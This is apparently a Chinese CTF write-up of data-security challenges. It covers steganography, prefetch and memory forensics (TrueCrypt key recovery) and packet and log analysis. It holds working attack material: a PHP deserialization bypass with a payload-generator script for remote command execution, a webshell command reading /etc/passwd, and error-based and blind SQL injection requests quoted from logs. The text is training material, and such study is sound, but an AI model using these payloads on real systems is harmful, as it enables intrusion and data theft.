02 数据安全解题赛
1、ds0602(30分):
题目描述:分析程序,获取对应附件中加密文件的原始数据,正确答案请提交解密后数据的第6行第2列数据
赛博厨一把梭
flag:767378199223105126
2、333file(45分):
题目描述:请下载并分析文件,获取重要数据
audacity打开发现没什么东西
binwalk一下发现有zip信息
再foremost一下分离出另一段音频
audacity打开发现频谱图是一段密码pass:stego0626
010打开,找到0x339CDE
偏移处,发现数据区少个头(关于zip)
补上数据区的PK头,即504B0304
打开zip,发现需要密码,输入刚才找到的stego0626
,打开发现乱码
是zlib压缩数据
丢赛博厨里
flag:81633464866e622d275c309b22cb907b
3、pf文件分析(35分):
题目描述:某公司某天通过监测发现有一个员工最近正在窃取公司的机密信息,从他的电脑获取了一个压缩文件包,里面有软件运行的统计信息。想要知道他是怎么干的,首先需要找到他最常用的软件,然后开始调查。
答案为使用次数最多的软件名称,例如软件名是IEXPLORE.EXE,则答案是IEXPLORE.EXE,所有字母请大写
压缩包名SUFNUEFTU1dPUkQ=
base64解密即为密码
发现prefetch
文件夹,里面都是.pd
文件
使用WinPrefetchView
,更改prefetch
运行次数降序排列
发现SEARCHFILTERHOST.EXE
运行次数最多
flag:SEARCHFILTERHOST.EXE
4、丢失的资料(45分):
题目描述:销售小张为了保护自己的客户资源,将一个重要客户的资料进行了重重保护,但他最近却发现自己忘记了关键的密码信息。请分析文件,帮助小张找回该资料,将资料中客户的手机号的32位小写md5值就是答案。题目附件请访问: https://www.123pan.com/s/44wjVv-516Wd.html?提取码:LjL0
执行
Volatility -f 1.raw --profile=Win7SP1x64 pslist
发现
获取TrueCrypt主密钥信息,并保存
Volatility -f 1.raw --profile=Win7SP1x64 truecryptmaster -D .
使用MKDecrypt恢复并挂载disk文件
python3 MKDecrypt.py disk -X ./0xfffffa80031c71a8_master.key
脚本必须在linux上运行,wsl不方便挂载,wm优选
从挂载的disk中找到客户信息表.xls
,有密码
执行
Volatility -f 1.raw --profile=Win7SP1x64 cmdscan
发现mysql密码ImportantInfo
发现ImportantInfo
就是xls密码
md5加密
flag:6a9902ce8b8cc3cc24db1bafc19e0d65
5、greatphp(45分):
题目描述:分析代码,获取重要数据
<?php
error_reporting(0);
class WOSHIMALOU {
public $Nihao;
public $Wohao;
public function __wakeup(){
if( ($this->Nihao != $this->Wohao) && (md5($this->Nihao) === md5($this->Wohao)) && (sha1($this->Nihao)=== sha1($this->Wohao)) ){
if(!preg_match("/\<\?php|\(|\)|\"|\'/", $this->Nihao, $match)){
eval($this->Nihao);
} else {
die("Try!!!!!!!!!");
}
}
}
}
if (isset($_GET['getflag'])){
unserialize($_GET['getflag']);
} else {
highlight_file(__FILE__);
}
对于此题可以利用php原生类Exception或Error或ErrorException绕过
例如Exception
class Exception implements Throwable {
/* 属性 */
protected string $message = "";
private string $string = "";
protected int $code;
protected string $file = "";
protected int $line;
private array $trace = [];
private ?Throwable $previous = null;
/* 方法 */
public __construct(string $message = "", int $code = 0, ?Throwable $previous = null)
final public getMessage(): string
final public getPrevious(): ?Throwable
final public getCode(): int
final public getFile(): string
final public getLine(): int
final public getTrace(): array
final public getTraceAsString(): string
public __toString(): string
private __clone(): void
}
message
异常消息内容
code
异常代码
file
抛出异常的文件名
line
抛出异常在该文件中的行号
previous
之前抛出的异常
string
字符串形式的堆栈跟踪
trace
数组形式的堆栈跟踪
那么Exception到底有什么用呢
以上输出了
Exception: here is massage! in D:\Users\1\Downloads\a.php:3
Stack trace:
#0 {main}
当Exception被当做string使用时,会自动调用Exception下的__tostring
方法,然后返回$string
私密属性
两次print_r
函数可以发现string:Exception:private
属性是在调用__tostring
方法时生成的
相当于,md5是对于以下字符串作运算
Exception: here is massage! in D:\Users\1\Downloads\a.php:3 Stack trace: #0 {main}
于是,可以轻易绕过md5
和sha1
,对Exception实例对象作MD5或sha1运算会返回__tostring
方法的返回值,即$string
属性,而对于$string
属性,是由$message
属性加上$line
属性文件位置以及固定字符串合成的,除了$message
属性和$line
属性其他都是基本不变的,所以Exception实例对象MD5或sha1运算的返回仅仅与$message
属性和$line
属性有关,即第一个参数和行号有关
在实例化代码同行的前提下,对于两个参数完全相等的Exception
实例对象是弱等于但不强等于的
于是,若想绕过($this->Nihao != $this->Wohao) && (md5($this->Nihao) === md5($this->Wohao)) && (sha1($this->Nihao)=== sha1($this->Wohao))
,首先需要赋于$Nihao
和$Wohao
二者Exception实例对象,然后即可转化为$Nihao
和$Wohao
对象之间弱不等于且__tostring
返回值强等于,剩下必须保证Exception
实例的第一个参数相同,二者实例化同行,且控制与__tostring
返回值不相干的属性不相同即可
以下利用第二个参数异常代码$code
绕过,可以发现行数都为15,异常代码一个为1,一个为0,异常消息内容都为<shell>
绕过可以轻松实现,可如何执行eval函数内php代码呢呢?
同样的,eval函数也将参数视为字符串类型,由此,传入Exception实例对象也会调用魔法函数__tostring,最后
测试发现,对于Exception实例对象的字符串返回中异常消息内容的前部分,即Exception:
,php不对其解析,不会构成报错
:
前可存在任意连续字符
而异常消息体后的内容可以通过?>
闭合绕过,同时多余内容不做php解析直接输出
/\<\?php|\(|\)|\"|\'/
正则,括号引号都被过滤了,如何执行shell呢,四大命令执行函数都用不了了,那就反引号简单绕过
最终payload生成脚本如下
<?php
class WOSHIMALOU
{
public $Nihao;
public $Wohao;
public function __construct($a, $b){
$this->Nihao=$a;
$this->Wohao=$b;
}
}
$shell="echo `shell`;?>"; //填入shell命令
$a = new Exception($shell);$b = new Exception($shell,1);
$o = new WOSHIMALOU($a,$b);
$s = urlencode(serialize($o));
echo $s;
04 数据安全分析赛
简单分析
1、请填写正确答案
小明所创建的网站受到了攻击,现在需要对数据包进行分析,请你帮助他解答疑惑问题一:攻击者成功登陆后台的账号密码是?(如账号为admin,密码为admin,提交admin:admin
分析http流
在流9中,发现登录痕迹
发现前几次账号密码错误
最后一次正确
其请求信息如下
POST /includes/login.php HTTP/1.1
Host: 172.16.5.217
Connection: keep-alive
Content-Length: 50
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://172.16.5.217
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://172.16.5.217/index.php?l=x
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=a61k2c2kpq11runk1jmkq0q731
user_uname=elvis&user_pass=1234&loginsubmit=Log+In
flag:elvis:1234
2、请填写正确答案(问答)
问题二:攻击者使用的webshell文件名称以及执行了什么命令?
(如文件名称为123.php,命令为ls,则提交123.php:ls)
导出http对象发现webshe11here.php
文件
对webshe11here.php
post上传了shell
cmd=system%28%27cat+..%2F..%2F..%2F..%2Fetc%2Fpasswd%27%29%3
url解码
执行cat ../../../../etc/passwd
webshe11here.php:cat …/…/…/…/etc/passwd
3、请填写正确答案(问答问题三):
被登录的后台用户对应的邮箱是什么?(如xxx@xxxx.com)
第一问得到登录用户为elvis
通过报错注入拿到uname
、user_date
、user_email
、user_pass
等
GET /post.php?pid=111%20AND%20GTID_SUBSET%28CONCAT%280x71766b7871%2C%28SELECT%20MID%28%28IFNULL%28CAST%28user_uname%20AS%20NCHAR%29%2C0x20%29%29%2C1%2C190%29%20FROM%20ed01cms.cms_users%20ORDER%20BY%20user_id%20LIMIT%200%2C1%29%2C0x716a7a7071%29%2C4061%29 HTTP/1.1
找到流99处(tcp.stream eq 99),爆出user_id=1处,uname
为elvis
通过限制user_id=1,找到其对应邮箱在流90
flag:elvis@stuvwxyz.com
黑客攻击探秘
1、请填写正确答案(问答)
某应用程序被攻击了,请分析日志回答以下问题
问题一:请问黑客采取的攻击手段是?(如有英文字母请大写)答案请先base64编码
后提交。例如:黑客采取的攻击手段是暴力破解,则先对“暴力破解”四个字进行 base64编码,得到5pq05Yqb56c06Kei,则提交5pq05Yqb56c06Kej
显然SQL注入,而且是盲注
对SQL注入
base64加密
flag:U1FM5rOo5YWl
2、请填写正确答案(问答)
问题二:请问黑客最终破解的数据库名、表名以及字段名是什么?请用下划线连接
例如:Database_table_column 输入答案
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),1,1)%20=%20'%C2%80',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 454 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),1,1)%20=%20'%7F',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),1,1)%20=%20'~',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),1,1)%20=%20'%7D',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),1,1)%20=%20'%7C',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),1,1)%20=%20'%7B',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),1,1)%20=%20'z',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),1,1)%20=%20'y',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),1,1)%20=%20'x',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),1,1)%20=%20'w',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),1,1)%20=%20'v',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),1,1)%20=%20'u',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),1,1)%20=%20't',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),1,1)%20=%20's',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),1,1)%20=%20'r',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),1,1)%20=%20'q',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),1,1)%20=%20'p',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),1,1)%20=%20'o',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),1,1)%20=%20'n',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),1,1)%20=%20'm',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),1,1)%20=%20'l',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),1,1)%20=%20'k',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),1,1)%20=%20'j',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),1,1)%20=%20'i',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),1,1)%20=%20'h',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),1,1)%20=%20'g',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),1,1)%20=%20'f',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 501 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),2,1)%20=%20'%C2%80',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 453 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),2,1)%20=%20'%7F',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),2,1)%20=%20'~',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),2,1)%20=%20'%7D',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),2,1)%20=%20'%7C',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),2,1)%20=%20'%7B',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),2,1)%20=%20'z',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),2,1)%20=%20'y',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),2,1)%20=%20'x',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),2,1)%20=%20'w',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),2,1)%20=%20'v',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),2,1)%20=%20'u',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),2,1)%20=%20't',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),2,1)%20=%20's',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),2,1)%20=%20'r',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),2,1)%20=%20'q',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),2,1)%20=%20'p',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),2,1)%20=%20'o',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),2,1)%20=%20'n',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),2,1)%20=%20'm',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),2,1)%20=%20'l',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 506 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),3,1)%20=%20'%C2%80',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 453 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),3,1)%20=%20'%7F',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),3,1)%20=%20'~',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),3,1)%20=%20'%7D',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),3,1)%20=%20'%7C',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),3,1)%20=%20'%7B',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),3,1)%20=%20'z',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),3,1)%20=%20'y',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),3,1)%20=%20'x',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),3,1)%20=%20'w',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),3,1)%20=%20'v',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),3,1)%20=%20'u',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),3,1)%20=%20't',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),3,1)%20=%20's',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),3,1)%20=%20'r',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),3,1)%20=%20'q',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),3,1)%20=%20'p',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),3,1)%20=%20'o',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),3,1)%20=%20'n',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
